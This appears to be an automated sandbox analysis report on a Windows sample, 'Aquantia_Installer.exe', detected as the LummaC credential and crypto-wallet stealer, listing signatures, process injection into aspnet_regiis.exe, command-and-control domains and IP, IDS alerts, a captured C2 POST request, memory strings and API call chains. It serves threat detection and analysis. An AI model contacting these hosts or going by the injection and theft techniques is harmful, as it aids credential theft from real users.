Edit tour

Windows Analysis Report
Aquantia_Installer.exe

Overview

General Information

Sample name:	Aquantia_Installer.exe
Analysis ID:	1561499
MD5:	a19287453762b8bed2b6a7ce68c413ca
SHA1:	3a2c2e5281803e16b7395aa02c2feede585acbf8
SHA256:	9cae15eb24885aae94012eba1f8cdfb39a08615f876897d8d056771e368b8a96
Tags:	exeuser-4k95m
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Aquantia_Installer.exe (PID: 3716 cmdline: "C:\Users\user\Desktop\Aquantia_Installer.exe" MD5: A19287453762B8BED2B6A7CE68C413CA)

conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 2380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["fumblingactor.cyou"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2136115217.000000000313E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2136092641.0000000003136000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Aquantia_Installer.exe PID: 3716	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2380	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2380	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 8 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:21:56.676266+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	172.67.155.47	443	TCP
2024-11-23T15:21:58.960386+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	172.67.155.47	443	TCP
2024-11-23T15:22:01.305096+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	172.67.155.47	443	TCP
2024-11-23T15:22:03.441953+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	172.67.155.47	443	TCP
2024-11-23T15:22:05.594550+0100	2028371	3	Unknown Traffic	192.168.2.5	49714	172.67.155.47	443	TCP
2024-11-23T15:22:08.097558+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	172.67.155.47	443	TCP
2024-11-23T15:22:10.655733+0100	2028371	3	Unknown Traffic	192.168.2.5	49717	172.67.155.47	443	TCP
2024-11-23T15:22:14.603009+0100	2028371	3	Unknown Traffic	192.168.2.5	49722	172.67.155.47	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:21:57.563162+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	172.67.155.47	443	TCP
2024-11-23T15:21:59.681780+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49706	172.67.155.47	443	TCP
2024-11-23T15:22:15.336433+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49722	172.67.155.47	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:21:57.563162+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	172.67.155.47	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:21:59.681780+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49706	172.67.155.47	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:22:08.867406+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49716	172.67.155.47	443	TCP

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs

Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2111243695.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/
Source: aspnet_regiis.exe, 00000003.00000003.2133641948.0000000003124000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/C
Source: aspnet_regiis.exe, 00000003.00000003.2175264585.000000000314B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2230167539.000000000314B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222804012.00000000030C7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2224031177.000000000314A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2162393319.000000000314B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2136223420.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222480553.0000000003141000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2225798680.00000000030C7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2136243200.0000000003134000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2223803833.0000000003146000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api
Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api#L
Source: aspnet_regiis.exe, 00000003.00000003.2161739316.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2175471255.0000000003158000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2162369698.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2230318456.000000000315E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157876608.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222676551.000000000315C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/api#O
Source: aspnet_regiis.exe, 00000003.00000003.2162393319.000000000314B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/apii
Source: aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/apixVebc
Source: aspnet_regiis.exe, 00000003.00000002.2230294668.0000000003153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs/g
Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogs-severz.sbs:443/apiAA3GM0RssN1u2sTrQHh4TeOMDePHoCR3hPAm7IHnVLLUAAAAAADoAAAAACAAAgAAAAVG
Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49722 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02F83340 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_02F83340

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02F83340 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_02F83340

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02F842DC GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_02F842DC

System Summary

PE file contains section with special chars

Source: Aquantia_Installer.exe

Static PE information: section name: 4mh:*

PE file has nameless sections

Source: Aquantia_Installer.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF26CA0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,VirtualAlloc,CreateProcessW,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,VirtualAlloc,NtAllocateVirtualMemory,CloseHandle,CloseHandle,CloseHandle,		0_2_6CF26CA0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF25C40 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,		0_2_6CF25C40

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_0101F500	0_2_0101F500
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_0101FF40	0_2_0101FF40
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_01031550	0_2_01031550
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_01006370	0_2_01006370
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_01041DA0	0_2_01041DA0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_010201C0	0_2_010201C0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_01032FD0	0_2_01032FD0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_010417D0	0_2_010417D0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_010391E0	0_2_010391E0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_01009C00	0_2_01009C00
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_01009840	0_2_01009840
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_01021270	0_2_01021270
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_010386B0	0_2_010386B0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF26CA0	0_2_6CF26CA0
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF25C40	0_2_6CF25C40
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF21300	0_2_6CF21300
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF21000	0_2_6CF21000
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF24160	0_2_6CF24160
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF38951	0_2_6CF38951
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF26670	0_2_6CF26670
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_6CF2E200	0_2_6CF2E200
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_0103A4D0	0_2_0103A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F5C292	3_2_02F5C292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6AA63	3_2_02F6AA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F74B09	3_2_02F74B09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F89160	3_2_02F89160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7DEC9	3_2_02F7DEC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F72E30	3_2_02F72E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F70FE0	3_2_02F70FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F77780	3_2_02F77780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F58CF0	3_2_02F58CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F914B0	3_2_02F914B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7CDBA	3_2_02F7CDBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F5DDA7	3_2_02F5DDA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F91D20	3_2_02F91D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F562F0	3_2_02F562F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7F2F9	3_2_02F7F2F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F52AE0	3_2_02F52AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F90270	3_2_02F90270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F8724D	3_2_02F8724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F8C230	3_2_02F8C230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F91A30	3_2_02F91A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7DA13	3_2_02F7DA13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7D39E	3_2_02F7D39E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F59B80	3_2_02F59B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7CB8C	3_2_02F7CB8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F79368	3_2_02F79368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6BB13	3_2_02F6BB13
